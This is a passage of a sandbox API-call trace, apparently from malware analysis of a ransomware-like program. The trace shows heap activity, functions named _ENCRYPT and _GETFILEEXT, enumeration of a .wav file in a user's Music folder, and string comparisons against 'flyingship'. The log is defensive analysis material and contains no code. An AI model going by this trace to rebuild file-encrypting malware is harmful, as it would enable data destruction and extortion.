hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.817] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0181.818] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.819] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.820] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0181.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.820] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0181.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.821] CloseHandle (hObject=0x138) returned 1 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.821] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.822] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0181.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0181.822] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.823] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0181.823] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.823] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0181.823] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.823] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.824] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.824] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0x90add8 [0181.825] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.825] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0x90add8 [0181.826] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.826] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, 